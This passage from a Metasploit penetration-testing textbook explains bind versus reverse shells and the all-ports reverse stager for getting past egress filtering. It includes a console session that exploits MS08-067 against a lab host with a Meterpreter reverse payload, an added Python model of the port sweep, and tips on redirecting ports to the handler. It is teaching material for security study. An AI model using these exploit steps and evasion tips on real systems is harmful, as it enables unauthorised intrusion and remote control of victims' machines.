The Joy of Exploitation
71
This type of exploit, called a heap-based attack, takes advantage of dynamic memory allocation, but it isn't 100 percent reliable: the heap state it depends on varies from run to run, so you may need to issue the exploit command a few times if it doesn't work the first time.
Notice that in this example we used a bind shell, which opens a listener port on the target machine; Metasploit then connects to that port for us automatically. A bind shell only works if you can reach the target's port directly, so remember to use a reverse payload when attacking through a firewall or NAT: the target then connects back to you instead.
All-Ports Payloads: Brute Forcing Ports
In the preceding examples we relied on the reverse connection's port always being open. But what if we're attacking an organization with very strict egress port filtering? Most companies block outbound connections except on a few defined ports, and from inside an exploit it can be difficult to determine which ports are allowed out.
We could guess that port 443 is unlikely to be inspected and will allow a TCP connection out, and that the FTP, Telnet, SSH, and HTTP ports (21, 23, 22, and 80) may be allowed too. But why guess when Metasploit has a payload built specifically to find an open egress port? The all-ports stager tries one port after another until a connection succeeds. (Walking the entire port range [1-65535] can take quite a long time, however, particularly when the filter silently drops packets instead of rejecting them, because every blocked port then costs a full connection timeout.)
Let's use this payload and have it try outbound ports until one succeeds:
msf > use windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > set LHOST 192.168.33.129
lhost => 192.168.33.129
msf exploit(ms08_067_netapi) > set RHOST 192.168.33.130
rhost => 192.168.33.130
msf exploit(ms08_067_netapi) > set TARGET 3
target => 3
msf exploit(ms08_067_netapi) > search ports
[*] Searching loaded modules for pattern 'ports'...

Compatible Payloads
===================

   Name                                      Rank    Description
   ----                                      ----    -----------
   windows/dllinject/reverse_tcp_allports    normal  Reflective Dll Injection, Reverse All-Port TCP Stager
   windows/meterpreter/reverse_tcp_allports  normal  Windows Meterpreter (Reflective Injection), Reverse All-Port TCP Stager
. . . SNIP . . .

msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/reverse_tcp_allports
payload => windows/meterpreter/reverse_tcp_allports
msf exploit(ms08_067_netapi) > exploit -j
[*] Exploit running as background job.
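To make the all-ports idea concrete, here is an added Python example; it is not code from the book or from Metasploit. It models, from the target's side, what an all-ports stager does: attempt a TCP connection to the attacker's address port by port, in an order modelled on the stager's (start at LPORT, count upward, wrap from 65535 back to 1), and report the first port that gets through. Everything it connects to is constructed for the demo: a local listener stands in for the attacker's handler, 127.0.0.1 stands in for LHOST, and a just-released ephemeral port stands in for a port the egress filter rejects. The function names (allports_sequence, find_egress_port, start_listener, reserve_closed_port) are this example's own.

```python
import socket
import socketserver
import threading


def allports_sequence(start_port, count=65535):
    """Probe order modelled on the reverse_tcp_allports stager: begin at the
    configured LPORT, count upward, and wrap from 65535 back to 1.  With the
    default count the sequence covers every TCP port exactly once."""
    if not 1 <= start_port <= 65535:
        raise ValueError("start_port must be in 1..65535")
    return [((start_port - 1 + i) % 65535) + 1 for i in range(count)]


def can_connect(host, port, timeout):
    """True if a TCP handshake to host:port completes within `timeout`.
    A RST (closed or rejected port) fails immediately; a silently dropped
    SYN, which is what most egress filters produce, fails only after the
    full timeout.  That difference is why an all-ports sweep is slow."""
    try:
        with socket.create_connection((host, port), timeout=timeout):
            return True
    except OSError:
        return False


def find_egress_port(host, ports, timeout=1.0):
    """Return the first port in `ports` that accepts a connection, or None
    if none does.  Calling this with allports_sequence(lport) is the brute
    force the text describes."""
    for port in ports:
        if can_connect(host, port, timeout):
            return port
    return None


class _Handler(socketserver.BaseRequestHandler):
    # Stand-in for the attacker's handler.  A real handler would deliver the
    # second stage here; the demo only needs the TCP handshake to succeed.
    def handle(self):
        pass


def start_listener(host="127.0.0.1", port=0):
    """Start a demo listener on a background thread.  Port 0 asks the OS for
    a free ephemeral port; the chosen port is returned with the server."""
    server = socketserver.TCPServer((host, port), _Handler)
    threading.Thread(target=server.serve_forever, daemon=True).start()
    return server, server.server_address[1]


def reserve_closed_port(host="127.0.0.1"):
    """Bind an ephemeral port and release it at once, so that for the next
    few milliseconds it is almost certainly closed.  Used to simulate a port
    that the egress filter rejects (constructed for the demo)."""
    with socket.socket() as s:
        s.bind((host, 0))
        return s.getsockname()[1]


if __name__ == "__main__":
    server, open_port = start_listener()
    blocked = [reserve_closed_port() for _ in range(3)]
    candidates = blocked + [open_port]
    print(f"listener on 127.0.0.1:{open_port}; probing {candidates}")
    print("first usable egress port:",
          find_egress_port("127.0.0.1", candidates, timeout=0.5))
    print("stager order from LPORT 65534:", allports_sequence(65534, 4))
    server.shutdown()
    server.server_close()
```

Two practical points follow from the model. First, the handler host must be able to receive the connection on whatever port the stager finally gets through on, so a single listener on LPORT is not enough; the attacking machine needs every inbound TCP port steered to the handler's port, for example with an iptables REDIRECT rule, before the exploit is launched. Second, because filtered ports usually drop rather than reject, the sweep's running time is dominated by timeouts, so choosing an LPORT close to a port you expect to be open (443, say) shortens the wait considerably.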